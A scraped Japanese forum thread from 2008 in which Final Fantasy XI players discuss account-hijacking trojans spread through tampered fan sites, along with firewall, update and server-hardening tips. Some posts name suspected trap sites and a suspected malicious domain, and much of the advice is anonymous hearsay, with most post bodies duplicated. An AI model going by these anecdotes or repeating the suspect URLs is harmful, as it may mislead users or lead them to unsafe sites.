しかも急いで録音したらしくかなりやっつけな音声wwwwwwwwww
635 :既にその名前は使われています:2008/08/11(月) 12:41:50 ID:7BJ3ob0m
XREAサポートフォーラムより
ttp://sb.xrea.com/showthread.php?t=12960
外部ユーザー様から通報いただいた1サイトのみの確認ですが、
ログから判断しますと、
スクリプト経由で書き換えられている可能性が高いと思われます。
スクリプト自体を最新にする
.htaccess に
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off
を記述する
万全ではありませんが、下記の方法でアクセス制限をする
ttp://sb.xrea.com/showpost.php?p=77290&postcount=3
といった対策があります。
他に数サイトあるようですが、他のサイトはまだ把握しておりません。
また、最新ではないXOOPS運用サイトでもなどでも
同様の改ざんがされることを確認できております。
なお、上記PHP設定項目が旧サーバーでOnになっているサーバーは、
アップデート時にサーバー側でOffに変更させていただいております。
ttp://sb.xrea.com/showthread.php?p=83962#post83962
ttp://sb.xrea.com/showthread.php?t=12960
外部ユーザー様から通報いただいた1サイトのみの確認ですが、
ログから判断しますと、
スクリプト経由で書き換えられている可能性が高いと思われます。
スクリプト自体を最新にする
.htaccess に
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off
を記述する
万全ではありませんが、下記の方法でアクセス制限をする
ttp://sb.xrea.com/showpost.php?p=77290&postcount=3
といった対策があります。
他に数サイトあるようですが、他のサイトはまだ把握しておりません。
また、最新ではないXOOPS運用サイトでもなどでも
同様の改ざんがされることを確認できております。
なお、上記PHP設定項目が旧サーバーでOnになっているサーバーは、
アップデート時にサーバー側でOffに変更させていただいております。
ttp://sb.xrea.com/showthread.php?p=83962#post83962
636 :既にその名前は使われています:2008/08/11(月) 13:24:12 ID:pYIFKQ3H
マップガイド今見たら改ざんされてたって報告があって始めて気づいた
期間中に思いっきり見まくってた・・・
誰かネ実にスレ立ててくれよー
マップガイドがやられてたのはwzcsvbxm.dll?
FireFox+NoscriptでPg2導入(テンプレサイトの6月までのIP弾き)
ただWindowsとフラッシュプレーヤーは最新じゃない・・(6月までの更新は○)
期間中に思いっきり見まくってた・・・
誰かネ実にスレ立ててくれよー
マップガイドがやられてたのはwzcsvbxm.dll?
FireFox+NoscriptでPg2導入(テンプレサイトの6月までのIP弾き)
ただWindowsとフラッシュプレーヤーは最新じゃない・・(6月までの更新は○)
637 :既にその名前は使われています:2008/08/11(月) 13:28:20 ID:JldOSKyz
>636
なんでWinとFlashは最新じゃねえんだよ。
まずそこを何とかしろよ。
なんでWinとFlashは最新じゃねえんだよ。
まずそこを何とかしろよ。
638 :既にその名前は使われています:2008/08/11(月) 13:35:07 ID:g33kro/e
もしかして垢ハック受けた奴は明日までスクエニに通報できないの?
639 :既にその名前は使われています:2008/08/11(月) 13:46:14 ID:pYIFKQ3H
>>637
はっきり言ってFireFoxのセットとPG2+COMODO、パスは保存せず毎回手動で安心しきってた
FC2は見ないようにしてたしdll改ざんは毎日落ちる度に確認してたから
とりあえず箱あけで見まくってた昨日のPG2の許可とブロックのログに>>361の奴は無かった
けどやっぱ際インスコか・・・
はっきり言ってFireFoxのセットとPG2+COMODO、パスは保存せず毎回手動で安心しきってた
FC2は見ないようにしてたしdll改ざんは毎日落ちる度に確認してたから
とりあえず箱あけで見まくってた昨日のPG2の許可とブロックのログに>>361の奴は無かった
けどやっぱ際インスコか・・・
640 :既にその名前は使われています:2008/08/11(月) 13:51:57 ID:J7en+GnH
641 :既にその名前は使われています:2008/08/11(月) 13:58:13 ID:7BJ3ob0m
642 :既にその名前は使われています:2008/08/11(月) 14:03:24 ID:73CUxqIy
>はっきり言ってFireFoxのセットとPG2+COMODO、パスは保存せず毎回手動で安心しきってた
これ見て不安なったんだが、cfpの仕様ちゃんと理解して設定とかルール作ってるか・・・?
理解できてないならcfpはお勧めしないよ。自分のレベルにあったものを使ったほうが安全だって。
被害にあう前に。
これ見て不安なったんだが、cfpの仕様ちゃんと理解して設定とかルール作ってるか・・・?
理解できてないならcfpはお勧めしないよ。自分のレベルにあったものを使ったほうが安全だって。
被害にあう前に。
643 :既にその名前は使われています:2008/08/11(月) 15:01:39 ID:CA3068y+
644 :既にその名前は使われています:2008/08/11(月) 15:24:01 ID:/L29dZn7
>>619
サンクス
Firefoxの、必要なアドオンは自分で入れてくださいっていうのがいやで
Opera使ってたんだがこれで少し安心できるわ
それとこのスレはちょっとしたセキュリティの勉強にもなるなw
サンクス
Firefoxの、必要なアドオンは自分で入れてくださいっていうのがいやで
Opera使ってたんだがこれで少し安心できるわ
それとこのスレはちょっとしたセキュリティの勉強にもなるなw
645 :既にその名前は使われています:2008/08/11(月) 16:17:33 ID:3ywAXBix
>>644
垢ハク犯に新たな手口や対策のヒントを与えているスレとも言えるがなw
垢ハク犯に新たな手口や対策のヒントを与えているスレとも言えるがなw
646 :既にその名前は使われています:2008/08/11(月) 16:17:53 ID:+keKJFaA
まぁ、確かにそうだなw
647 :既にその名前は使われています:2008/08/11(月) 16:20:17 ID:y6DafzTu
パス送信先を米国鯖にされたことがあるからなぁ
648 :既にその名前は使われています:2008/08/11(月) 16:56:21 ID:zXtTBRlk
FF11・マップガイド(ネット便利)は さくらに移転
ドメイン移管で見られなかったみたいね。
どっちにしてもサイト管理者は 捨てアドでいいから連絡先書いといてほしいものだ。
お盆明けに 一気に感染サイトや感染報告増えそうな悪寒。
ドメイン移管で見られなかったみたいね。
どっちにしてもサイト管理者は 捨てアドでいいから連絡先書いといてほしいものだ。
お盆明けに 一気に感染サイトや感染報告増えそうな悪寒。
649 :既にその名前は使われています:2008/08/11(月) 17:38:40 ID:3/rEOqYK
スクエニはさっさと被害届けだせ
何か弱みでもあるのか?
何か弱みでもあるのか?
650 :既にその名前は使われています:2008/08/11(月) 17:47:11 ID:nElbZURA
ゲーム鯖ハックされた訳じゃないから動かん。
651 :既にその名前は使われています:2008/08/11(月) 17:51:58 ID:y6DafzTu
>>649
弱みではなくうまみ
一日に何件くらいやられてるかわからないけど、鯖移動代がコンスタントに入ってくる。
まあただの陰謀論だけどさ。
>>617とか>>650みたいな建前を用意してるみたいだけど、リネでもROでも「他人のIDパスを
使って不正にアクセスした」人間の逮捕事例がしっかりある。鯖に対するハッキングでなくともね。
弱みではなくうまみ
一日に何件くらいやられてるかわからないけど、鯖移動代がコンスタントに入ってくる。
まあただの陰謀論だけどさ。
>>617とか>>650みたいな建前を用意してるみたいだけど、リネでもROでも「他人のIDパスを
使って不正にアクセスした」人間の逮捕事例がしっかりある。鯖に対するハッキングでなくともね。
652 :既にその名前は使われています:2008/08/11(月) 17:54:14 ID:gMrQYDAM
カスペ完全スキャン後、週一のパス変更して新しいパスでログインしようとしたら
IDパスが違いますでログインできなくなったwハックされたか、新しいパスを打ち間違えて
登録しちまったかどっちかわからない状態。明日不正チャットで聞くしかないかw
IDパスが違いますでログインできなくなったwハックされたか、新しいパスを打ち間違えて
登録しちまったかどっちかわからない状態。明日不正チャットで聞くしかないかw
653 :既にその名前は使われています:2008/08/11(月) 17:55:39 ID:UG+QOaol
654 :既にその名前は使われています:2008/08/11(月) 17:57:05 ID:y6DafzTu
>>652
パスの再発行なら電話でもできると思うけど、今はどうなってるだろうな
そこらへんは全部チャットサポート行きになってるのかなぁ。
昔パス保存してあったPS2が壊れてパスわからなくなったときに
サポセンに電話して再発行してもらったことがある。
パスの再発行なら電話でもできると思うけど、今はどうなってるだろうな
そこらへんは全部チャットサポート行きになってるのかなぁ。
昔パス保存してあったPS2が壊れてパスわからなくなったときに
サポセンに電話して再発行してもらったことがある。
655 :既にその名前は使われています:2008/08/11(月) 18:18:24 ID:xuanXKFQ
>>652
フレにキャラ動いてないかみてもらえば?
フレにキャラ動いてないかみてもらえば?
656 :既にその名前は使われています:2008/08/11(月) 18:27:32 ID:QgY5xpJr
657 :既にその名前は使われています:2008/08/11(月) 19:12:13 ID:Tq2qWubo
>>651
それは、そのアクセスされた人が訴えたんだろう。
それは、そのアクセスされた人が訴えたんだろう。
658 :既にその名前は使われています:2008/08/11(月) 19:12:21 ID:GKd+pLWm
ageマース
659 :既にその名前は使われています:2008/08/11(月) 19:31:05 ID:y6DafzTu
>>657
垢ハック被害者の申請で運営側が訴えたんだよ
垢ハック被害者の申請で運営側が訴えたんだよ
660 :既にその名前は使われています:2008/08/11(月) 19:49:56 ID:9kaBAPAV
661 :既にその名前は使われています:2008/08/11(月) 20:01:34 ID:d767xzND
■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!
※最近業者が行っても無駄だの馬鹿にされるだの
逮捕されないために必死になってるので注意!
警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。
不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!
※最近業者が行っても無駄だの馬鹿にされるだの
逮捕されないために必死になってるので注意!
警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。
662 :既にその名前は使われています:2008/08/11(月) 20:05:01 ID:FB4xiLyY
いま、インしようとしたらプレイオンラインIDがちがいますっていわれたんだが・・・これってハックされたってこと?
663 :既にその名前は使われています:2008/08/11(月) 20:07:52 ID:yMy2uXOn
664 :既にその名前は使われています:2008/08/11(月) 20:08:01 ID:y6DafzTu
665 :既にその名前は使われています:2008/08/11(月) 20:08:40 ID:zHrKq+OX
いあ、IDが違うっていうのは基本的にありえないでしょ、パスワードならともかく
666 :既にその名前は使われています:2008/08/11(月) 20:09:52 ID:30Crq30Y
IDが違うってことは
毎回ゲストログインつかってるツワモノなんだろうな
毎回ゲストログインつかってるツワモノなんだろうな
667 :既にその名前は使われています:2008/08/11(月) 20:09:59 ID:Pw1j2lk4
きっとID欄にパスワード入れたんだよ
668 :既にその名前は使われています:2008/08/11(月) 20:10:07 ID:y6DafzTu
669 :既にその名前は使われています:2008/08/11(月) 20:10:26 ID:yMy2uXOn
POLに繋がなくても公式で確認できる
ここの右上の「プレイオンライン会員情報」にアクセスできなければハックされてるよ
http://www.playonline.com/ff11/index.shtml
ここの右上の「プレイオンライン会員情報」にアクセスできなければハックされてるよ
http://www.playonline.com/ff11/index.shtml
670 :既にその名前は使われています:2008/08/11(月) 20:11:01 ID:FB4xiLyY
いつもはPS3で保存でやってたんだけど、会社のPCで、今日の昼間パス入力して遊んだんだ・・・それでかなぁ・・・どうしよう(´;ω;`)
671 :既にその名前は使われています:2008/08/11(月) 20:11:38 ID:zHrKq+OX
672 :671:2008/08/11(月) 20:13:08 ID:zHrKq+OX
パスワードっぽいな
673 :既にその名前は使われています:2008/08/11(月) 20:13:37 ID:9OG553lY
何が入ってるかわからん会社のPCなんかで遊ぶな
674 :既にその名前は使われています:2008/08/11(月) 20:14:12 ID:7BJ3ob0m
>>670
会社のPCでトロイ飼ってるのはマズいだろ。管理者に相談。
会社のPCでトロイ飼ってるのはマズいだろ。管理者に相談。
675 :既にその名前は使われています:2008/08/11(月) 20:15:10 ID:L0VWBc40
PG2で0.0.0.0-255.255.255.255をブロックして
>>10だけ許可リストに入れてFFしようと思うんだけど
PG2が61.113.95.11とか
204.203.18.138をはじくんだ
これ許可するとつながるんだけど
許可しないといけないもの?
POLのバージョンチェックでひっかかる。
なんでだろ
>>10だけ許可リストに入れてFFしようと思うんだけど
PG2が61.113.95.11とか
204.203.18.138をはじくんだ
これ許可するとつながるんだけど
許可しないといけないもの?
POLのバージョンチェックでひっかかる。
なんでだろ
676 :既にその名前は使われています:2008/08/11(月) 20:15:30 ID:Pw1j2lk4
大した垢ハック対策もしてない、職場のネットに繋がるFF系ブログとかIEで見まくりの
遊び用PCにパスワード入力とか、かなりの強者ですね
遊び用PCにパスワード入力とか、かなりの強者ですね
677 :既にその名前は使われています:2008/08/11(月) 20:17:33 ID:1h2xZmKF
ここ見てカスペのフルスキャンを初体験したんだ
トレンドマイクロ、アンチウ゛ァイラスとかいうのが感染してました。
試用期間終わるから課金しようか迷ってたけど、
危ないところだった?
トレンドマイクロ、アンチウ゛ァイラスとかいうのが感染してました。
試用期間終わるから課金しようか迷ってたけど、
危ないところだった?
678 :既にその名前は使われています:2008/08/11(月) 20:24:04 ID:y6DafzTu
>>677
トレンドマイクロってのはウイルスバスターの製造元
アンチヴァイラスってのはAntiVirusのこと?それならウイルスバスター系統のソフトだと思うけど。
バスター使用中に見つけたウイルスを隔離しているファイルをカスペが見つけて
ウイルス扱いしてるんじゃない?
感染ファイル名を書けるならここに書いてみ。
トレンドマイクロってのはウイルスバスターの製造元
アンチヴァイラスってのはAntiVirusのこと?それならウイルスバスター系統のソフトだと思うけど。
バスター使用中に見つけたウイルスを隔離しているファイルをカスペが見つけて
ウイルス扱いしてるんじゃない?
感染ファイル名を書けるならここに書いてみ。
679 :既にその名前は使われています:2008/08/11(月) 20:26:10 ID:6PIWGOeu
キャラが消されていたり鯖移動されていたりしても、、、、落ち込まないようにね。
まぁアイテムすべてなくなっているのは確実だろうけど、、
たしか単純に巻き戻すのではなく第三者に売却されたアイテム(オークションやバザーで売却されたアイテムギルはアウト)以外
を戻すんだっけ?
まぁアイテムすべてなくなっているのは確実だろうけど、、
たしか単純に巻き戻すのではなく第三者に売却されたアイテム(オークションやバザーで売却されたアイテムギルはアウト)以外
を戻すんだっけ?
680 :既にその名前は使われています:2008/08/11(月) 20:27:43 ID:yfAHc5lt
>>670
これまでに同じように会社のPCでプレイしたことはある?
これまでに同じように会社のPCでプレイしたことはある?
681 :既にその名前は使われています:2008/08/11(月) 20:30:30 ID:T3BS51/j
>>679
ん?すごく単純に巻き戻すよ?
ん?すごく単純に巻き戻すよ?
682 :既にその名前は使われています:2008/08/11(月) 20:31:20 ID:yMy2uXOn
683 :既にその名前は使われています:2008/08/11(月) 20:31:38 ID:FB4xiLyY
これまでも、昼休みとかに同じPCで遊んでましたー(´・ω・`)いままでなんともなかったんで、たいして気にもしてなかったんですが・・自業自得だけど、いまパニってます(´Д⊂
684 :既にその名前は使われています:2008/08/11(月) 20:32:46 ID:3/rEOqYK
>>679
ごく単純に最終バックアップの次点に戻すはず
ごく単純に最終バックアップの次点に戻すはず
685 :既にその名前は使われています:2008/08/11(月) 20:36:40 ID:1h2xZmKF
>>678
以前、確かに隔離したファイルがあったのは記憶してるんですが、
感染してる→焦ってカスペインスコ→アンチヴァイラスを消さないとダメ→証拠隠滅
で、残ってない気が。
直前にPOL立ち上げたら、
pol.exeに干渉しようとするDLLをVISTAがブロックしてたので慌ててしまい、
ファイル名とか残してないのですよ。
これだから素人は、、、
帰ったらちょっと見てみますわ。
以前、確かに隔離したファイルがあったのは記憶してるんですが、
感染してる→焦ってカスペインスコ→アンチヴァイラスを消さないとダメ→証拠隠滅
で、残ってない気が。
直前にPOL立ち上げたら、
pol.exeに干渉しようとするDLLをVISTAがブロックしてたので慌ててしまい、
ファイル名とか残してないのですよ。
これだから素人は、、、
帰ったらちょっと見てみますわ。
686 :既にその名前は使われています:2008/08/11(月) 20:36:58 ID:8jN8ezSF
業者いいばっかりじゃないかよw
キャラ巻き戻し時に、宅配とかトレードでどういうつながりが
アカウントハックの際にあったのか調べて、芋づる式に摘発とかできんのかぜ
キャラ巻き戻し時に、宅配とかトレードでどういうつながりが
アカウントハックの際にあったのか調べて、芋づる式に摘発とかできんのかぜ
687 :既にその名前は使われています:2008/08/11(月) 20:37:03 ID:zHrKq+OX
巻き戻しが2ヶ月前の報告もあります
688 :既にその名前は使われています:2008/08/11(月) 20:39:13 ID:2sqaLb++
これって問題の罠埋め込まれてるサイトが外部から不正にアクセスされてサイトを書き換えられたって事?
それとも、ユーザーじゃなくてもサイト更新できるのが仕様なの?
それとも、ユーザーじゃなくてもサイト更新できるのが仕様なの?
689 :既にその名前は使われています:2008/08/11(月) 20:39:50 ID:6PIWGOeu
690 :既にその名前は使われています:2008/08/11(月) 20:40:21 ID:Pw1j2lk4
691 :既にその名前は使われています:2008/08/11(月) 20:41:17 ID:+keKJFaA
たかがゲームと思ってRMT放置、中途半端な対策を行った結果だな。
692 :既にその名前は使われています:2008/08/11(月) 20:41:49 ID:zHrKq+OX
693 :既にその名前は使われています:2008/08/11(月) 20:42:18 ID:y6DafzTu
61.113.95.0/24ってAkamai Internationalってとこなんだけど
POLのバージョンチェックはスクエニのサーバーで完結しないのかな
POLでパス入れた後、ここにつなぎに行ってる人いる?
POLのバージョンチェックはスクエニのサーバーで完結しないのかな
POLでパス入れた後、ここにつなぎに行ってる人いる?
695 :既にその名前は使われています:2008/08/11(月) 20:50:58 ID:2sqaLb++
696 :既にその名前は使われています:2008/08/11(月) 20:52:16 ID:zHrKq+OX
>>694
PG2が弾くのは、ブロックリストにそのIPが入ってるからです
わたしのブロックリストにはそのIPが入っていないのでなにのブロックリストなのかが
わかりませんが、全IPブロックしてPOLだけ許可なら、そのブロックリストを外せば
いいと思いますよ
PG2が弾くのは、ブロックリストにそのIPが入ってるからです
わたしのブロックリストにはそのIPが入っていないのでなにのブロックリストなのかが
わかりませんが、全IPブロックしてPOLだけ許可なら、そのブロックリストを外せば
いいと思いますよ
697 :既にその名前は使われています:2008/08/11(月) 20:53:08 ID:y6DafzTu
>>695
バスターの公式WEBが改竄されてMMOのハックウイルス仕込まれたことがあるよ
そりゃどこでも狙えるって訳ではなくて、何らかの穴や手段があるんだろうけど
個人運営のHPで管理人が気を付けていれば済むってレベルではなさそう
バスターの公式WEBが改竄されてMMOのハックウイルス仕込まれたことがあるよ
そりゃどこでも狙えるって訳ではなくて、何らかの穴や手段があるんだろうけど
個人運営のHPで管理人が気を付けていれば済むってレベルではなさそう
698 :696:2008/08/11(月) 20:55:56 ID:zHrKq+OX
って、単純に書いちゃったけどなんかちょっと違うな・・・
トラッキングかなにかが入ってるのかな?
トラッキングかなにかが入ってるのかな?
699 :既にその名前は使われています:2008/08/11(月) 21:21:08 ID:yfAHc5lt
>>683
アカハクはパス抜かれ>即日ハック っていうのはここ最近のトロイの挙動見てれば無さげ
どこからかトロイ拾う→トロイがデータベースにパス送る→データベースのリストを元に業者が流れ作業で処理 だから
報告でも(先月辺りの前兆出るタイプなら)兆候が出てから1〜2週間後にやられた、ってパターンがけっこうある
「今までなんともなかった」んじゃなくって「もうすでに抜かれてて処理待ちだった」だけだったと思う
最近は「気付かないうちに抜かれる」手口がほとんどだから、安全が確保されてないPCでプレイするのは自殺行為だわ
アカハクはパス抜かれ>即日ハック っていうのはここ最近のトロイの挙動見てれば無さげ
どこからかトロイ拾う→トロイがデータベースにパス送る→データベースのリストを元に業者が流れ作業で処理 だから
報告でも(先月辺りの前兆出るタイプなら)兆候が出てから1〜2週間後にやられた、ってパターンがけっこうある
「今までなんともなかった」んじゃなくって「もうすでに抜かれてて処理待ちだった」だけだったと思う
最近は「気付かないうちに抜かれる」手口がほとんどだから、安全が確保されてないPCでプレイするのは自殺行為だわ
700 :既にその名前は使われています:2008/08/11(月) 21:56:17 ID:iObT9MdG
>>618
XREA 1039045744:88 の確認されたサイト
吟遊詩人テンプレ:メニュー ヘッダー
8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
8月9日00時00分頃〜8月11日00時00分頃
マップガイドトップに期間が書いてあったので更新。
>>635
XREAはPHPスクリプト(PukiWiki?)のせいだと言いたいみたいだけど、
忍テンプレはPHP使って無いし、今回の件については的外れな感じが。
XREAのFTPパスワードが全体的に抜かれて改竄された、っていうのが一番しっくりくるんだけど
そういうことはあり得るのかなぁ?
XREA 1039045744:88 の確認されたサイト
吟遊詩人テンプレ:メニュー ヘッダー
8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
8月9日00時00分頃〜8月11日00時00分頃
マップガイドトップに期間が書いてあったので更新。
>>635
XREAはPHPスクリプト(PukiWiki?)のせいだと言いたいみたいだけど、
忍テンプレはPHP使って無いし、今回の件については的外れな感じが。
XREAのFTPパスワードが全体的に抜かれて改竄された、っていうのが一番しっくりくるんだけど
そういうことはあり得るのかなぁ?
701 :既にその名前は使われています:2008/08/11(月) 21:57:58 ID:yfAHc5lt
・自動Windowsupdateしてるから大丈夫だろうと思っていたらトロイがすりかわっててUpdateできなくなってた
・白門モグから徒歩1分の路上で業者がアカハク品転売シャウトしてた
・POLがぐにゃりと強制終了したので再ログインしてみるとパスが変えられてた
・高額装備をしたPCがアカハクされ、凍結が解けたら裸で別鯖にいた
・他の端末で外部からログインした、というかログインした後からパスとかを変更する
・モグハウスまで業者に襲撃され、取引可も「エクレアも」全部換金された
・Flashplayer9.0.115.0から9.0.124.0までのバージョンの間に脆弱性を突かれた
・ウィルス対策ソフトメーカーなら安全だろうと思ったら、HP改竄されてトロイしこまれてた
・ウィルスソフトの1/3がアカハクウィルス未対応。しかもウィルス対策ソフトが入ってれば大丈夫という都市伝説から「そういう人ほど危ない」
・「そんな危険なわけがない」といって無警戒でブラウズしてたPCが2週間後アカハクされてた
・「貧乏プレイヤーならば襲われるわけがない」と言ってたユニクロ装備のPCが所持品を全店売りされ知らないLS付けてBOTにされてた
・最近流行っている手口は「人気サイト改竄」 無警戒のユーザーが次々引っかかるから
・無策のPCユーザーはアカハクにあう確率が150%。一度ハクられて(対策せずにログインして)またハクられる確率が50%の意味
・ピーク時の業者サーバーにおけるハッキングデータ蓄積数は1日平均500件、同種のトロイの送り先は少なくとも2ヶ所(被害数は×2)
・白門モグから徒歩1分の路上で業者がアカハク品転売シャウトしてた
・POLがぐにゃりと強制終了したので再ログインしてみるとパスが変えられてた
・高額装備をしたPCがアカハクされ、凍結が解けたら裸で別鯖にいた
・他の端末で外部からログインした、というかログインした後からパスとかを変更する
・モグハウスまで業者に襲撃され、取引可も「エクレアも」全部換金された
・Flashplayer9.0.115.0から9.0.124.0までのバージョンの間に脆弱性を突かれた
・ウィルス対策ソフトメーカーなら安全だろうと思ったら、HP改竄されてトロイしこまれてた
・ウィルスソフトの1/3がアカハクウィルス未対応。しかもウィルス対策ソフトが入ってれば大丈夫という都市伝説から「そういう人ほど危ない」
・「そんな危険なわけがない」といって無警戒でブラウズしてたPCが2週間後アカハクされてた
・「貧乏プレイヤーならば襲われるわけがない」と言ってたユニクロ装備のPCが所持品を全店売りされ知らないLS付けてBOTにされてた
・最近流行っている手口は「人気サイト改竄」 無警戒のユーザーが次々引っかかるから
・無策のPCユーザーはアカハクにあう確率が150%。一度ハクられて(対策せずにログインして)またハクられる確率が50%の意味
・ピーク時の業者サーバーにおけるハッキングデータ蓄積数は1日平均500件、同種のトロイの送り先は少なくとも2ヶ所(被害数は×2)
702 :既にその名前は使われています:2008/08/11(月) 22:14:58 ID:sto4++40
普通にシャットダウンしたらPOLが異常終了してビビた
703 :既にその名前は使われています:2008/08/11(月) 22:24:55 ID:7BJ3ob0m
>>700
あるいは単純にXREAのrootが抜かれたw
あるいは単純にXREAのrootが抜かれたw
704 :既にその名前は使われています:2008/08/11(月) 22:28:51 ID:9kaBAPAV
僕たちFFユーザーはだんだんと狭いインターネッツになってきましたね^^;
705 :既にその名前は使われています:2008/08/11(月) 22:57:08 ID:Rdd70fK0
ほんとド素人なんですが、新しいPCでまったくWebも見たりしなければ垢ハックはされない?
706 :既にその名前は使われています:2008/08/11(月) 23:03:47 ID:s/cQcYNu
>>705
メールは見るわけ? そのPCでさ
メールは見るわけ? そのPCでさ
707 :既にその名前は使われています:2008/08/11(月) 23:04:04 ID:wllXEFUi
708 :既にその名前は使われています:2008/08/11(月) 23:08:06 ID:4gYW5ufy
709 :既にその名前は使われています:2008/08/11(月) 23:14:19 ID:7BJ3ob0m
USBメモリ経由で感染する奴とかいくらでもあるね
710 :既にその名前は使われています:2008/08/11(月) 23:16:54 ID:yfAHc5lt
某社のUSBメモリに出荷段階でアカハクウィルス入ってたこともあったしのう
711 :既にその名前は使われています:2008/08/11(月) 23:18:11 ID:74yxQZ+b
ノートンで反応するのですが
詳細分かる方だけクリックお願いします。
なんか仕掛けられているかも知れません。
リネージュ2の情報サイトのむぶろぐなのですが
ttp://mutukina.net/
stardustddns.game-server.ccというところからデータが転送されているようでノートンで警告が出ます。
詳細わかるかたいらっしゃいますでしょうか?
詳細分かる方だけクリックお願いします。
なんか仕掛けられているかも知れません。
リネージュ2の情報サイトのむぶろぐなのですが
ttp://mutukina.net/
stardustddns.game-server.ccというところからデータが転送されているようでノートンで警告が出ます。
詳細わかるかたいらっしゃいますでしょうか?
712 :既にその名前は使われています:2008/08/11(月) 23:33:23 ID:Rdd70fK0
メールも使うつもりはないですね。完全FF専用予定です。
713 :既にその名前は使われています:2008/08/11(月) 23:37:06 ID:QQA8Vw4+
714 :既にその名前は使われています:2008/08/11(月) 23:39:15 ID:zXtTBRlk
>ノートンで反応するのですが
>詳細分かる方だけクリックお願いします。
何がどう反応してるのかわからなきゃ誰も答えられないでしょ。
そういうのは 鑑定スレみたいなとこで聞きなさい。
第一リネのブログをここで聞くのってどうよw
>>635>>700
黒魔メモは改ざんされたのが rootのpukiwiki.phpとindex.php(ジョブ板参照)でパーミッションが604だったらしいから
サーバのphp設定のスキをつかれたってのは納得。
吟テンプレのほうは設置してるwikiで静的サイトを生成してたのかってのと
忍テンプレが基本的に静的サイトだから改ざんルートが気になるとこだよね。
>詳細分かる方だけクリックお願いします。
何がどう反応してるのかわからなきゃ誰も答えられないでしょ。
そういうのは 鑑定スレみたいなとこで聞きなさい。
第一リネのブログをここで聞くのってどうよw
>>635>>700
黒魔メモは改ざんされたのが rootのpukiwiki.phpとindex.php(ジョブ板参照)でパーミッションが604だったらしいから
サーバのphp設定のスキをつかれたってのは納得。
吟テンプレのほうは設置してるwikiで静的サイトを生成してたのかってのと
忍テンプレが基本的に静的サイトだから改ざんルートが気になるとこだよね。
715 :既にその名前は使われています:2008/08/11(月) 23:39:54 ID:7BJ3ob0m
716 :既にその名前は使われています:2008/08/11(月) 23:40:51 ID:rNz5D0bw
検索してたら「FF11情報局-FFXIアルタナの神兵を徹底攻略」ってサイトを見つけたんですが、
昔あった「花の雫FF11情報局」って罠サイトと名前が似てるなーと思い出したんです。
aguseで調べたら日本のドメインでしたが、このサイト大丈夫なんでしょうか?
ttp://event.surpara.com/ff11/
昔あった「花の雫FF11情報局」って罠サイトと名前が似てるなーと思い出したんです。
aguseで調べたら日本のドメインでしたが、このサイト大丈夫なんでしょうか?
ttp://event.surpara.com/ff11/
717 :既にその名前は使われています:2008/08/11(月) 23:46:06 ID:7BJ3ob0m
鑑定は他でやってくれ
>>713
カスペオンラインスキャンしたんですが特に何も見つからず。
61.113.95.0/24のAkamai Internationalのサーバの場所は東京らしいです。
ここをブロックしたままだと「プレイオンラインビューアー」のバージョンをチェックしています」とで続け
さらにそのまま放置すると「バージョンアップ通信エラー」(POL-1160)が出るので終了を押すと
「バージョンアップに失敗しました」と出ます。
PG2のログを見ていると、POL起動直後にもつなぎに行っていますね。
気持ち悪いです。
カスペオンラインスキャンしたんですが特に何も見つからず。
61.113.95.0/24のAkamai Internationalのサーバの場所は東京らしいです。
ここをブロックしたままだと「プレイオンラインビューアー」のバージョンをチェックしています」とで続け
さらにそのまま放置すると「バージョンアップ通信エラー」(POL-1160)が出るので終了を押すと
「バージョンアップに失敗しました」と出ます。
PG2のログを見ていると、POL起動直後にもつなぎに行っていますね。
気持ち悪いです。
719 :既にその名前は使われています:2008/08/11(月) 23:47:01 ID:Yx5rt1fC
怪しいURLそのまま貼るなw
720 :既にその名前は使われています:2008/08/11(月) 23:49:34 ID:yfAHc5lt
721 :既にその名前は使われています:2008/08/11(月) 23:51:00 ID:zXtTBRlk
>>675 自分で少しは調べなよ
ttp://www.akamai.co.jp/jp/html/casestudy/case_study_square_enix.html
スクエニは アカマイのインフラ使ってる
ttp://www.akamai.co.jp/jp/html/casestudy/case_study_square_enix.html
スクエニは アカマイのインフラ使ってる
722 :既にその名前は使われています:2008/08/11(月) 23:53:48 ID:MlZtxA0f
Akamaiサーバーってバスター
723 :既にその名前は使われています:2008/08/11(月) 23:55:07 ID:MlZtxA0f
途中でで送信してしまった
Akamaiサーバーってバスターとかも使ってる有名なサーバーですよ
Akamaiサーバーってバスターとかも使ってる有名なサーバーですよ
724 :既にその名前は使われています:2008/08/11(月) 23:55:10 ID:zXtTBRlk
補足
アップデート用のキャッシュファイルを置いてるんだと思うよ
675の polなりffxiのバージョンが最新じゃないから アカマイからDLしようとしてる
それをブロックするからバージョンアップエラーが出る
polとffxiのバージョンを確認してみたまえ
アップデート用のキャッシュファイルを置いてるんだと思うよ
675の polなりffxiのバージョンが最新じゃないから アカマイからDLしようとしてる
それをブロックするからバージョンアップエラーが出る
polとffxiのバージョンを確認してみたまえ
725 :既にその名前は使われています:2008/08/11(月) 23:55:23 ID:jhDHiiPk
726 :既にその名前は使われています:2008/08/11(月) 23:56:14 ID:M0NbImNx
どーでもいいけどpukiwiki1.4.7(最新版)じゃpukiwiki.phpはindex.phpと統合されたから特に必要なファイルじゃなくなったんだよな
とか言ってみる
とか言ってみる
727 :716:2008/08/11(月) 23:59:38 ID:rNz5D0bw
ごめんなさい、初めてだったのでどうしたらいいかわからなくて。
鑑定スレ行ってみます。ありがとうございました。
鑑定スレ行ってみます。ありがとうございました。
728 :既にその名前は使われています:2008/08/12(火) 00:03:01 ID:o6vKIM3D
やられた…
729 :既にその名前は使われています:2008/08/12(火) 00:16:17 ID:kYz4Nzr2
>>721、>>723、>>724
ありがとうございます。
すいません。
アカマイとか聞いたことなくて;
とりあえずPOLのバージョン確認しましたがVer.1.18.10eでした。
